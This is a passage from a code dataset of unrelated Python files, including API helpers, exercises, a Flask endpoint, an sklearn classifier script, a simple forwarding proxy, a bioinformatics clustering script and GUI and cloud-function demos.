self.info:\n ids.append(entry['id'])\n return ids\n\n def id_lookup(self, name):\n \"\"\"Get id for name\"\"\"\n for entry in self.info:\n if entry['name'] == name:\n return entry['id']\n raise ValueError(_name + \" Not in Names\")\n\n def name_lookup(self, _id):\n \"\"\"Get id for _id\"\"\"\n for entry in self.info:\n if entry['id'] == _id:\n return entry['name']\n raise ValueError(_id + \" Not in ids\")\n","sub_path":"pylinnworks/api_requests/settings/get_info_request.py","file_name":"get_info_request.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653351755","text":"#coding=utf-8\nfrom selenium import webdriver\nchrome_capabilities ={\n \"browserName\": \"chrome\",\n \"version\": \"65.0.3325.181\",#注意版本号一定要写对\n \"platform\": \"ANY\",\n \"javascriptEnabled\": True,\n \"marionette\": True,\n}\n\nbrowser=webdriver.Remote(\"http://192.168.192.131:5555/wd/hub\",desired_capabilities=chrome_capabilities) #注意端口号5555是我们上文中映射的宿主机端口号\n\nbrowser.get(\"http://www.baidu.com\")\n\nbrowser.get_screenshot_as_file(\"/home/jack/jenkins/baidu.png\")\n\nbrowser.close()\n\n","sub_path":"jenkins/scripts/seleniumDemp.py","file_name":"seleniumDemp.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"500868772","text":"from flask import request,jsonify\nfrom F.AI import AI\n\n\ndef feature_1(mongo):\n try:\n result=\"\"\n get = request.get_json()\n query=mongo.db.Exist_Query\n check1=query.find_one({\n 'store_id':get['store_id'],\n 'years':get['years'],\n 'months':get['months'],\n 'date':get['date']\n })\n if check1:\n result=jsonify({\n 'electric_predict':str(round(float(check1['electric_predict']),4)),\n 'base64_graph':check1['base64_graph'],\n 'type':'Exist_Query'\n })\n else:\n # down here for calling north's functions~~~~\n elect_predict,encoded=AI(get['store_id'],get['years'],get['months'],get['date'])\n elect_predict=round(elect_predict,4)\n query_id=query.insert({\n \"store_id\":get['store_id'],\n \"years\":get['years'],\n \"months\":get['months'],\n \"date\":get['date'],\n \"electric_predict\":str(elect_predict),\n \"base64_graph\":encoded.decode()\n })\n result=jsonify({\n 'electric_predict':str(elect_predict),\n 'base64_graph':encoded.decode(),\n 'type':'Call_Fuction'\n })\n return result\n except:\n result=jsonify({\n 'message':\"An error or exception occurred\"\n })\n return result","sub_path":"Gen2SAEVERBANK/saver-bank-api/saver-bank-app/F/feature_1.py","file_name":"feature_1.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"388750802","text":"def foo():\n xlist = []\n for i in range(4):\n x = input(\"Enter a number: \")\n xlist.append(x)\n return xlist\nprint(foo())\n#\nxlist= [2,3,1]\nylist=xlist.sort()\nprint(xlist,ylist)\n#\ndef get_formatted_name(first_name,last_name,middle_name = \"\"):\n if middle_name != \"\":\n name = first_name + \" \" + last_name\n else:\n name = first_name + \" \" +middle_name+ last_name\n return name\nprint(get_formatted_name('john','lee','hookie'))\n","sub_path":"tyyy.py","file_name":"tyyy.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67439798","text":"import instructions\nimport functions\nimport re\nimport sys\nimport struct\n\n\n\n# TODO: Add includes\n# TODO: Fix MW VR & VW\n# TODO: Not JMP/RET warnings\n# TODO: Review code before data\n# TODO: Add .org if needed\n\nclass Assembler(instructions.Assembler, functions.Assembler):\n\n\n\tREG = \"\\%(?:A|B|C|D|FL|SB|SP|PC)\"\n\tREG_IND = \"\\[[ABCD]{1}\\]\"\n\tHEX = \"0x[0-9a-fA-F]{1,6}\"\n\tINT = \"[0-9]{1,8}\"\n\tALPHANUMERIC = \"\\w+\"\n\tOFFSET = \"(?:([\\+\\-]{1})(\" + INT + \"|\" + HEX + \"|\" + REG + \")){0,1}\"\n\tNUMBER_INT = \"#\" + INT\n\tLABEL = \"(?:(\\w+)\\:\\s+){0,1}\"\n\tspc = \"\\s+\"\n\tsep = \",\\s+\"\n\n\tMAX_INT = 16777215 # 0xffffff\n\tOPCODES = { \n\t\t\"NOP\": \t0x00,\n\t\t\"HALT\": 0x01,\n\t\t\"MR\": \t0x02,\n\t\t\"MW\": \t0x03,\n\t\t\"VR\":\t0x04,\n\t\t\"VW\":\t0x05,\n\t\t\"LD\":\t0x06,\n\t\t\"DBG\":\t0x07,\n\t\t\"PUSH\": 0x08,\n\t\t\"POP\": 0x09,\n\t\t\"JMP\":\t0x0a,\n\t\t\"RET\":\t0x0b,\n\t\t\"CALL\": 0x0c,\n\t\t\"ARITH\":0x0d\n\t}\n\n\tMODES = {\n\t\t# Addressing modes\n\t\t\"INDIRECT\": \t\t0x00,\n\t\t\"INDIRECT+NEAR\": \t0x01,\n\t\t\"INDIRECT+REG\": \t0x02,\n\t\t\"INDIRECT+FAR\": \t0x03,\n\t\t\"INDIRECT-NEAR\":\t0x04,\n\t\t\"INDIRECT-REG\":\t\t0x05,\n\t\t\"INDIRECT-FAR\":\t\t0x06,\n\t\t\"ABSOLUTE\":\t\t\t0x07,\n\t\t\"ABSOLUTE+NEAR\":\t0x08,\n\t\t\"ABSOLUTE+REG\":\t\t0x09,\n\t\t\"ABSOLUTE+FAR\":\t\t0x0a,\n\t\t\"ABSOLUTE-NEAR\":\t0x0b,\n\t\t\"ABSOLUTE-REG\":\t\t0x0c,\n\t\t\"ABSOLUTE-FAR\":\t\t0x0d,\n\t\t\"unused1\":\t\t\t0x0e,\n\t\t\"unused2\":\t\t\t0x0f,\n\n\t\t# Value modes\n\t\t\"REGISTER\":\t\t\t0x00,\n\t\t\"VALUE\":\t\t\t0x01\n\t}\n\n\tREGISTERS = {\n\t\t\"%A\": \t\t0x00,\n\t\t\"%B\": \t\t0x01,\n\t\t\"%C\": \t\t0x02,\n\t\t\"%D\": \t\t0x03,\n\t\t\"unused1\":\t0x04,\n\t\t\"unused2\":\t0x05,\n\t\t\"unused3\":\t0x06,\n\t\t\"unused4\":\t0x07,\n\t\t\"unused5\":\t0x08,\n\t\t\"unused6\":\t0x09,\n\t\t\"unused7\":\t0x0a,\n\t\t\"unused8\":\t0x0b,\n\t\t\"%FL\":\t\t0x0c,\n\t\t\"%SB\":\t\t0x0d,\n\t\t\"%SP\":\t\t0x0e,\n\t\t\"%PC\":\t\t0x0f\n\t}\n\n\n\n\tARITH_FUNCS = {\n\t\t\"ADD\":\t0x00,\n\t\t\"SUB\":\t0x01,\n\t\t\"DIV\":\t0x02,\n\t\t\"MUL\":\t0x03,\n\t\t\"IDIV\":\t0x04,\n\t\t\"IMUL\":\t0x05\n\t}\n\n\n\tline_count = 1;\n\tinstructions = []\n\tcode = []\n\tdata = []\n\tlabelpass = []\n\n\tbinary_file = []\n\t\t\n\tlabels = dict()\n\n\tcurrent_code_addr = 0\n\tcurrent_data_addr = 0\n\tin_code = True\n","sub_path":"oldfiles/oldcode/tools/assembler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192600011","text":"###########################################################\n### v1 - funcs, using deque + rotate\n\nfrom collections import deque\n\nrows, columns = [int(el) for el in input().split()]\nsnake = deque(list(input()))\n\n\ndef create_matrix(rows, columns, snake):\n matrix = []\n for row in range(rows):\n matrix.append([])\n for col in range(columns):\n matrix[row].append(snake[0])\n snake.rotate(-1)\n return matrix\n\n\ndef print_matrix(matrix):\n for i in range(rows):\n if i % 2 != 0:\n matrix[i].reverse()\n print(\"\".join(matrix[i]))\n\n\n\nmatrix = create_matrix(rows, columns, snake)\nprint_matrix(matrix)\n\n\n###########################################################\n###########################################################\n### v2 - no funcs, using only lists and list slicing\n\nrows, cols = [int(el) for el in input().split()]\nword = input()\ncount = 0\na_list = []\n\nfor _ in range(rows * cols):\n if count == len(word):\n count = 0\n a_list.append(word[count])\n count += 1\n\na_list = ''.join(a_list)\nstart, stop = 0, cols\n\nfor i in range(rows):\n if i % 2 != 0:\n print(a_list[stop - 1:start - 1:-1])\n else:\n print(a_list[start:stop])\n start += cols\n stop += cols\n\n###########################################################\n###########################################################\n### v3 no funcs but with some killer snake moves!!!\n\nfrom collections import deque\nrows, cols = input().split()\nline = deque(list(input()))\nmatrix = [[0 for el in range(int(cols))] for row in range(int(rows))]\n\nfor row_index in range(int(rows)):\n if row_index % 2 == 0:\n for col_index in range(int(cols)):\n matrix[row_index][col_index] = line[0]\n line.rotate(-1)\n print(*matrix[row_index], sep=\"\")\n else:\n for col_index in range(int(cols)-1, -1, -1):\n matrix[row_index][col_index] = line[0]\n line.rotate(-1)\n print(*matrix[row_index], sep=\"\")\n","sub_path":"python_advanced_jan 2021/python_advanced/03 multidimensional_lists/03.02. exercise/05. snake_moves.py","file_name":"05. snake_moves.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"604898735","text":"#!/usr/bin/env python\n# Copyright (c) 2019 VMware, Inc. All Rights Reserved.\n# SPDX-License-Identifier: BSD-2 License\n# The full license information can be found in LICENSE.txt\n# in the root directory of this project.\n\nimport platform\n\nLINUX_OS = \"Linux\" in platform.uname()\n\n# Logging Constants\nLINUX_LOG_DIR = \"/var/log/axon\"\nWIN_LOG_DIR = \"C:\\\\axon\\\\log\"\nLOG_DIR = LINUX_LOG_DIR if LINUX_OS else WIN_LOG_DIR\nLOG_FILE = \"axon.log\"\n\n# Axon Service Constants\nAXON_PORT = 5678\n\n# Recorder Constants\nWAVEFRONT = 'wavefront'\nSQL = 'sql'\n","sub_path":"axon/common/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51474840","text":"#encoding=utf-8\nimport socket\nimport threading\nimport re\nimport traceback\n\n# 提取目地服务器地址\ndef getAddr(data): \n data = data.decode('utf8')\n re_result = re.search(\"Host: (.*)\\r\\n\", data)\n host = re_result.group(1)\n addr = host.split(\":\")\n if len(addr) == 1:\n return (addr[0], 80)\n return (addr[0], int(addr[1]))\n\n# 等待server数据,转发回client\ndef waitServerResponse(server, client):\n try:\n while 1:\n data = server.recv(10240)\n if not data:\n break\n client.sendall(data)\n except:\n pass\n\ndef handleClientReq(conn, caddr):\n try:\n https_addr = None\n server = None\n while 1: \n data = conn.recv(10240) # buffer=1M\n # 空数据则关闭连接\n if not data:\n break\n # 代理https请求时,client会先发送个CONNECT请求告知目的地址\n if b\"CONNECT\" in data:\n # 提取https请求中的目地地址\n https_addr = getAddr(data)\n conn.send(b\"HTTP/1.1 200 Connection established\\r\\n\\r\\n\")\n print(\"https请求connect完成\")\n continue\n # 提取http请求中的目地地址\n if not https_addr:\n addr = getAddr(data)\n print( '发给目的服务器数据:',data )\n else:\n addr = https_addr\n print( '您的连接是https,发送的数据已经被加密...',)\n # 连接目地服务器\n if not server:\n print( \"目的服务器:\", addr)\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n server.connect(addr)\n # 启动一个等待server response的线程\n t = threading.Thread(target=waitServerResponse, args=(server, conn)).start()\n server.sendall(data) #将请求数据发给目的服务器 \n print(\"连接代理完成:\", caddr)\n except Exception as e:\n print('代理的客户端异常:%s, ERROR:%s'%(caddr,e))\n traceback.print_exc()\n finally:\n # 关闭连接\n conn.close()\n server.close()\n\ndef serve():\n PORT=10086\n IP = \"0.0.0.0\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((IP, PORT))\n s.listen(10)\n print('代理服务器启动在 %s:%s...' % (IP,PORT))\n try:\n while True:\n conn, addr = s.accept()\n print('\\n连接来自: ', addr)\n # 多线程处理请求\n t = threading.Thread(target=handleClientReq, args=(conn, addr)).start()\n finally:\n s.close()\n\ntry:\n serve()\nexcept Exception as e:\n print( '代理服务器异常', e)\n\n\n\n","sub_path":"proxy/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303626429","text":"import datetime\n\nfrom src.node import build_hashgraph_from_event_history\nimport logging\n\n\nlog = logging.getLogger('run_hashgraph')\nlog.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlog.addHandler(ch)\n\nif __name__ == \"__main__\":\n start_time = datetime.datetime.now()\n build_hashgraph_from_event_history('/home/trafim/git/openworld/debug/event_history_node_0_2018-01-22_15:00:14.csv',\n save_image=False)\n end_time = datetime.datetime.now()\n log.info('Time elapsed {}.'.format(end_time - start_time))\n","sub_path":"src/debug_hashgraph.py","file_name":"debug_hashgraph.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"519757504","text":"# Import dependencies\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn import preprocessing\r\ndataset_url = \"https://github.com/rt16/ml_model_api/blob/main/stress_data_set.csv\"\r\ncol_names = ['I found it hard to wind down',\r\n 'I tended to over-react to situations',\r\n 'I felt that I was using a lot of nervous energy',\r\n 'I found myself getting agitated',\r\n 'I found it difficult to relax',\r\n 'I was intolerant of anything that kept me from getting on with what I was doing',\r\n 'I felt that I was rather touchy',\r\n 'Result']\r\ndata = pd.read_csv(dataset_url)\r\nprint(data);\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabel_encoder = LabelEncoder()\r\n#apply label encoding\r\ndata['I found it hard to wind down'] = label_encoder.fit_transform(data['I found it hard to wind down'])\r\ndata['I tended to over-react to situations'] = label_encoder.fit_transform(data['I tended to over-react to situations'])\r\ndata['I felt that I was using a lot of nervous energy'] = label_encoder.fit_transform(data['I felt that I was using a lot of nervous energy'])\r\ndata['I found myself getting agitated'] = label_encoder.fit_transform(data['I found myself getting agitated'])\r\ndata['I found it difficult to relax'] = label_encoder.fit_transform(data['I found it difficult to relax'])\r\ndata['I was intolerant of anything that kept me from getting on with what I was doing'] =label_encoder.fit_transform(data['I was intolerant of anything that kept me from getting on with what I was doing'])\r\ndata['I felt that I was rather touchy'] = label_encoder.fit_transform(data['I felt that I was rather touchy'])\r\ndata['Result'] = label_encoder.fit_transform(data['Result'])\r\nprint(data.head(20))\r\nfeature_cols = ['I found it hard to wind down',\r\n 'I tended to over-react to situations',\r\n 'I felt that I was using a lot of nervous energy',\r\n 'I found myself getting agitated',\r\n 'I found it difficult to relax',\r\n 'I was intolerant of anything that kept me from getting on with what I was doing',\r\n 'I felt that I was rather touchy']\r\nresult_cols = ['Result']\r\nX = data[feature_cols] # Features\r\ny = data[result_cols] # Target variable\r\n# Split dataset into training set and test set\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=1) # 70% training and 30% test\r\n# Create Decision Tree classifer object\r\nclf = DecisionTreeClassifier()\r\n\r\n# Train Decision Tree Classifer\r\nclf = clf.fit(X_train, y_train)\r\n\r\n# Predict the response for test dataset\r\ny_pred = clf.predict(X_test)\r\nprint(clf.predict([[1,1,1,1,1,1,1]]))\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\n# Save your model\r\nimport joblib\r\njoblib.dump(clf, 'model.pkl')\r\nprint(\"Model dumped!\")\r\n\r\n# Load the model that you just saved\r\nclf = joblib.load('model.pkl')\r\n\r\n# Saving the data columns from training\r\nmodel_columns = list(X.columns)\r\nprint(model_columns)\r\njoblib.dump(model_columns, 'model_columns.pkl')\r\nprint(\"Models columns dumped!\")\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"468619823","text":"import math\r\nimport datetime\r\nimport numpy as np\r\nimport itertools\r\nfrom scipy.cluster.hierarchy import dendrogram, linkage, average, fcluster, fclusterdata, to_tree\r\n\r\n\r\nNonRedundantSequencesFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/Nonredundant_repeats.txt\"\r\nRepeatsAssignedFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/RepeatsIdentical.txt\"\r\nRepeatsSimilaritiesFileName = \"/panfs/pan1/orphancrispr/AllRepeatsVsAllRepeats_fix.hits\"\r\nAllArraysInfoFileName =\"/home/utkinai2/Project1/merged_all.csv\"\r\nFilteredRepeatsSimilaritiesFileName = \"/panfs/pan1/orphancrispr/ClusteringRepeats/0703/AllRepeatsVsAllRepeats_fix_filtered_Dist.hits\"\r\n\r\n\r\nRepeatLengthsByID = {}\r\nfor line in open(AllArraysInfoFileName,\"r\"):\r\n LineValues = line[:-1].split(\",\")\r\n RepeatLengthsByID[str(LineValues[2] + '_' + LineValues[3] + '_' + LineValues[4])] = len(LineValues[6])\r\n\r\nNonRedundantSet = set()\r\nfor line in open(NonRedundantSequencesFileName, \"r\"):\r\n NonRedundantSet.add(line[:-1])\r\n\r\nUniqueSet = set()\r\nprint(datetime.datetime.now())\r\nwith open (FilteredRepeatsSimilaritiesFileName, \"w\") as FilteredFile:\r\n for line in open(RepeatsSimilaritiesFileName, \"r\"):\r\n LineValues = line[:-1].split('\\t')\r\n Name1 = LineValues[0]\r\n Name2 = LineValues[1]\r\n if (Name1, Name2) in UniqueSet:\r\n continue\r\n\r\n if Name1 in NonRedundantSet and Name2 in NonRedundantSet:\r\n Coverage = int(LineValues[2]) / int(max(RepeatLengthsByID[Name2], RepeatLengthsByID[Name1]))\r\n if Coverage > 0.8:\r\n Score = int(LineValues[3]) * min(RepeatLengthsByID[Name1], RepeatLengthsByID[Name2]) / (\r\n max(RepeatLengthsByID[Name2], RepeatLengthsByID[Name1]) * 2 * int(LineValues[2]))\r\n if Score != 1:\r\n Dist = - math.log(Score)\r\n FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n UniqueSet.add((Name1, Name2))\r\n else:\r\n if (Name1,Name2) not in UniqueSet:\r\n Dist = 0.0\r\n FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n UniqueSet.add((Name1, Name2))\r\n else:\r\n continue\r\n # if (Name1, Name2) in DictWithDoubledScores:\r\n # DictWithDoubledScores[Name1, Name2] = max(int(DictWithDoubledScores[Name1, Name2]), Dist)\r\n # else:\r\n # DictWithDoubledScores[Name1, Name2] = max(0, Dist)\r\n\r\n # else:\r\n # if (Name1, Name2) not in UniqueSet:\r\n # Dist = 1.0\r\n # FilteredFile.write(Name1 + '\\t' + Name2 + '\\t' + str(Dist) + '\\n')\r\n # UniqueSet.add((Name1, Name2))\r\n # else:\r\n # continue\r\nprint(datetime.datetime.now())\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ClusteringRepeats_0703_step2.py","file_name":"ClusteringRepeats_0703_step2.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142750185","text":"# coding: utf-8\n\nimport wx\n\napp = wx.App()\nframe = wx.Frame(None, wx.ID_ANY, \"タイトル付きBoxSizer\", size=(300,300))\n\npanel = wx.Panel(frame, wx.ID_ANY)\npanel.SetBackgroundColour(\"#AFAFAF\")\n\nbutton_1 = wx.Button(panel, wx.ID_ANY, \"ボタン1\")\nbutton_2 = wx.Button(panel, wx.ID_ANY, \"ボタン2\")\nbutton_3 = wx.Button(panel, wx.ID_ANY, \"ボタン3\")\n\nbox = wx.StaticBox(panel, wx.ID_ANY, \"boxsizer_static\")\n\nlayout = wx.StaticBoxSizer(box, wx.HORIZONTAL)\n# layout = wx.StaticBoxSizer(box, wx.VERTICAL)\n\nlayout.Add(button_1)\nlayout.Add(button_2)\nlayout.Add(button_3)\n\npanel.SetSizer(layout)\n\nframe.Show()\napp.MainLoop()","sub_path":"wxpython_proc/06_boxsizer_static.py","file_name":"06_boxsizer_static.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463524972","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 11 11:34:11 2017\n\n@author: PaulJ\n\"\"\"\n\n\nimport datetime as dt\nimport pandas as pd\nimport tkinter as tk\nimport em_global_variables\n# from extract_fastest_stats import extract_fastest_stats\n\n\nEXERCISE_STATS = em_global_variables.EXERCISE_STATS\n\n\ndef create_fastest_stats_lf(\n parent_frame,\n activity_or_summary_object,\n row=0,\n column=1,\n overall=False,\n frame_title='Fastest Time in Activity',\n frame_title_font=em_global_variables.TABLE_TITLE_FONT):\n \"\"\"\n Function to create fastest stats labelframe\n \"\"\"\n # Start of Time, VDOT by Distance Stats\n fslf_ysize = 5\n\n # Get Fastest Stats from Exercise Summary File\n if not overall:\n try:\n if activity_or_summary_object.ex_sum['Activity_Type'] == \"Running\":\n running_only = True\n else:\n running_only = False\n except KeyError:\n running_only = False\n else:\n activity_list = (\n activity_or_summary_object.get_all_act_sum()['Activity_Types'])\n try:\n if len(activity_list) == 1 and activity_list[0] == \"Running\":\n running_only = True\n else:\n running_only = False\n except KeyError:\n running_only = False\n\n try:\n fastest_stats = activity_or_summary_object.get_records()\n except ValueError:\n fastest_stats = pd.DataFrame()\n\n # Fastest Stats LabelFrame/Table Heading\n fastest_stats_lf = tk.LabelFrame(parent_frame,\n text=frame_title,\n font=frame_title_font,\n padx=5, pady=5)\n fastest_stats_lf.grid(row=row,\n column=column,\n sticky=('n'))\n\n if len(fastest_stats) == 0:\n pace_stats_no_stats = tk.Label(\n fastest_stats_lf,\n text='There are no fastest stats for this activity',\n font=em_global_variables.TABLE_SUBTITLE_FONT,\n padx=10,\n pady=10,\n justify='left')\n pace_stats_no_stats.pack(anchor='n',\n fill='both',\n side='left')\n return 1, 3\n\n # Fastest Stats Column Heading\n fs_dist_subtitle1 = tk.Label(fastest_stats_lf,\n text='Distance',\n padx=3, pady=3,\n font=em_global_variables.TABLE_SUBTITLE_FONT)\n fs_dist_subtitle1.grid(row=0, column=0, sticky=('n'))\n fs_dist_subtitle2 = tk.Label(fastest_stats_lf,\n text=' Time ',\n padx=3, pady=3,\n font=em_global_variables.TABLE_SUBTITLE_FONT)\n fs_dist_subtitle2.grid(row=0, column=1, sticky=('n'))\n if running_only:\n fs_dist_subtitle3 = tk.Label(\n fastest_stats_lf,\n text='VDOT',\n padx=3, pady=3,\n font=em_global_variables.TABLE_SUBTITLE_FONT,\n # bg='slate gray',\n # fg='white'\n )\n fs_dist_subtitle3.grid(row=0, column=2, sticky=('n'))\n\n # Fastest Stats Column Underline\n fs_col_titles_ul = tk.Canvas(fastest_stats_lf,\n bg=\"black\",\n height='0.5m',\n width='20m')\n fs_col_titles_ul.grid(row=1,\n column=0,\n columnspan=3,\n sticky=('new'))\n\n # Create Fastest Stats Distance Labels\n for stat_no, a_stat in fastest_stats.iterrows():\n if a_stat['Time'] <= 0:\n # Filter out bad times\n continue\n fslf_ysize += 1\n label_var = a_stat['Stat_Var']+\"_Lab\"\n a_dict = {label_var: tk.Label(fastest_stats_lf,\n text=a_stat['Stat_Label'],\n font=em_global_variables.VAR_LABEL_FONT,\n padx=5,\n pady=2,\n justify='right')}\n a_dict[a_stat['Stat_Var']+\"_Lab\"].grid(row=stat_no+2,\n column=0,\n # columnspan=1,\n sticky=(\"ne\"))\n value_var = a_stat['Stat_Var'] + \"_Time_Val\"\n # print('a_stat[\"Time\"]:', a_stat['Time'])\n field_value = (dt.datetime(1, 1, 1) + # time + 1 day\n dt.timedelta(seconds=a_stat['Time']))\n if field_value.day-1 > 0:\n field_val_string = format(\"%d days, %d h, %d m, %.1f s\" % (\n field_value.day-1,\n field_value.hour,\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n elif field_value.hour > 0:\n field_val_string = format(\"%d h, %d m, %.1f s\" % (\n field_value.hour,\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n elif field_value.minute > 0:\n field_val_string = format(\"%d m, %.1f s\" % (\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n else:\n field_val_string = format(\"%.1f s\" % (\n field_value.second+field_value.microsecond/1e6))\n a_dict[value_var] = tk.Label(fastest_stats_lf,\n text=field_val_string,\n font=em_global_variables.VAR_VAL_FONT,\n justify=\"right\")\n a_dict[a_stat['Stat_Var']+\"_Time_Val\"].grid(row=stat_no+2,\n column=1,\n columnspan=1,\n sticky=(\"ne\"))\n if running_only:\n vdot_value_var = a_stat['Stat_Var']+\"_VDOT_Val\"\n vdot_field_value = a_stat['VDOT']\n a_dict[vdot_value_var] = tk.Label(\n fastest_stats_lf,\n text=vdot_field_value,\n font=em_global_variables.VAR_VAL_FONT,\n justify=\"right\")\n a_dict[a_stat['Stat_Var']+\"_VDOT_Val\"].grid(row=stat_no+2,\n column=2,\n columnspan=1,\n sticky=(\"ne\"))\n\n return 1, fslf_ysize\n","sub_path":"fastest_stats_lf.py","file_name":"fastest_stats_lf.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227098601","text":"from django.conf.urls import url,include\nfrom . import views\n\nurlpatterns = [\n\n url(r'^register/$', views.register,name=\"api-register\"),\n\n url(r'^login/',views.login,name='api-login'),\n\n url(r'^add/',views.addnewpaste,name='api-addp'),\n\n url(r'^del/',views.dele,name='api-delp'),\n\n url(r'^search/',views.search,name='api-search'),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"403686036","text":"import base64\nimport ubiops\n\n\ndef ubiops_request(event, context):\n \"\"\"\n Deployment batch request triggered from a message on a Cloud Pub/Sub topic.\n\n :param dict event: Event payload.\n :param google.cloud.functions.Context context: Metadata for the event.\n \"\"\"\n\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n\n # The API Token for UbiOps is hardcoded for simplicity in this example.\n # This should *absolutely never* be done in a production like environment.\n # Instead make use of the solutions provided, in this case by Google, to handle secrets and passwords.\n configuration = ubiops.Configuration()\n configuration.api_key['Authorization'] = 'Token abcdefghijklmnopqrstuvwxyz'\n\n client = ubiops.ApiClient(configuration)\n api = ubiops.api.CoreApi(client)\n api.batch_deployment_requests_create(\n project_name='test-project',\n deployment_name='test-deployment',\n version='version',\n data=[pubsub_message]\n )\n","sub_path":"google-cloud-functions-triggered-request/gcp-functions-recipe/functions/deployment-batch-request/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651497170","text":"import os, json\n\nreplacelist = [\n[\"REPLACE_TEAM1\", \"\"],\n[\"REPLACE_TEAM2\", \"\"],\n[\"REPLACE_JSFILE\", \"\"],\n[\"REPLACE_INDEX\", \"https://www.guessgoldgraph.gg/LEC\"]\n]\n\n# Get the list of all files and directories\ndirpath = \"/lolesport_get/goleu\"\npath = os.getcwd() + dirpath\ndir_list = os.listdir(path)\n\n\n# index_html.writes all files\nfindgold = \"label: 'Gold',\"\nbefore = \"\t\t\t\tdata: \"\nafter = \" ,\"\nblen = len(before)\nalen = len(after)\nfindtime = \"col-sm-5\"\nbtime = len(\"
\")\natime = len(\"
\") + 1\nbteam1 = len(\" \")\nateam1 = \"

\"\n\nteam_dict = {\n\t'EG': 'EG',\n\t'100 Thieves': '100',\n\t'GG': 'GG',\n\t'Immortals': 'IMT',\n\t'Dignitas': 'DIG',\n\t'Team Liquid': 'TL',\n\t'CLG': 'CLG',\n\t'TSM': 'TSM',\n\t'FlyQuest': 'FLY',\n\t'Cloud9': 'C9'\n}\n\n\nbase_js = open(\"base_js.txt\", 'r')\nbase_html = open(\"base_html.txt\", 'r')\nbase_js_lines = base_js.readlines()\nbase_html_lines = base_html.readlines()\n\nweekgames = []\n\nfor gol in dir_list:\n\tgolfile = open(path + \"/\" + gol, 'r')\n\tprint(gol)\n\tlines = golfile.readlines()\n\tfilestr = \"\"\n\tgoldarray = []\n\tteam1 = \"\"\n\tteam2 = \"\"\n\tweek = -1\n\tfor index, line in enumerate(lines):\n\t\tif findgold in line:\n\t\t\tgoldlist = lines[index + 1][blen:][:-alen]\n\t\t\tgoldlist = goldlist[:-3] + \"]\"\n\t\t\tgoldarray = json.loads(goldlist)\n\t\tif findtime in line:\n\t\t\tdateweek = line[btime:][:-atime]\n\t\t\tdwarr = dateweek.split(\" \")\n\t\t\ttime = dwarr[0]\n\t\t\tfilestr = filestr + time\n\t\t\tweek = int(dwarr[1][5])\n\t\tif \"empty_action title_blue\" in line:\n\t\t\tteamstr = line[bteam1:].split(ateam1)\n\t\t\tteam1 = teamstr[0]\n\t\t\tprint(gol, len(teamstr), ateam1)\n\t\t\tteam2 = teamstr[1].split(\"
